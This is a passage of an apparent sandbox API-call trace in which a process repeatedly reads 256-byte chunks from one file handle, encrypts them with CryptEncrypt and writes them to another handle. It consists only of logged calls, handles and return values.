CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.125] GetLastError () returned 0x0 [0172.125] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.125] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.125] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.125] GetLastError () returned 0x0 [0172.125] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.125] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.125] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.125] GetLastError () returned 0x0 [0172.125] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.126] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.126] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.126] GetLastError () returned 0x0 [0172.126] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.126] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.126] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.126] GetLastError () returned 0x0 [0172.126] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.126] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.126] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.126] GetLastError () returned 0x0 [0172.126] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.126] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.126] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.126] GetLastError () returned 0x0 [0172.126] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.126] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.126] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.126] GetLastError () returned 0x0 [0172.126] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.126] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.126] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.126] GetLastError () returned 0x0 [0172.126] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.127] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.127] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.127] GetLastError () returned 0x0 [0172.127] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.127] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.127] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.127] GetLastError () returned 0x0 [0172.127] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.127] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.127] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.127] GetLastError () returned 0x0 [0172.127] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.127] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.127] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.127] GetLastError () returned 0x0 [0172.127] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.127] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.127] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.127] GetLastError () returned 0x0 [0172.127] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.127] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.127] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.128] GetLastError () returned 0x0 [0172.128] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.128] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.128] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.128] GetLastError () returned 0x0 [0172.128] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.128] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.128] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.128] GetLastError () returned 0x0 [0172.128] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.128] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.128] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.128] GetLastError () returned 0x0 [0172.128] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.128] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.128] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.128] GetLastError () returned 0x0 [0172.128] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.128] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.128] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.128] GetLastError () returned 0x0 [0172.128] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.128] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.128] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.128] GetLastError () returned 0x0 [0172.128] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.128] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.129] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.129] GetLastError () returned 0x0 [0172.129] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.129] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.129] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.129] GetLastError () returned 0x0 [0172.129] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.129] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.129] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.129] GetLastError () returned 0x0 [0172.129] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.129] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.129] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.129] GetLastError () returned 0x0 [0172.129] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.129] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.129] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.129] GetLastError () returned 0x0 [0172.129] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.129] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.129] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.129] GetLastError () returned 0x0 [0172.129] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.129] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.130] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.130] GetLastError () returned 0x0 [0172.130] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.130] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.130] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.130] GetLastError () returned 0x0 [0172.130] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.130] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.130] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.130] GetLastError () returned 0x0 [0172.130] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.130] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.130] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.130] GetLastError () returned 0x0 [0172.130] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.130] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.130] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.130] GetLastError () returned 0x0 [0172.130] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, 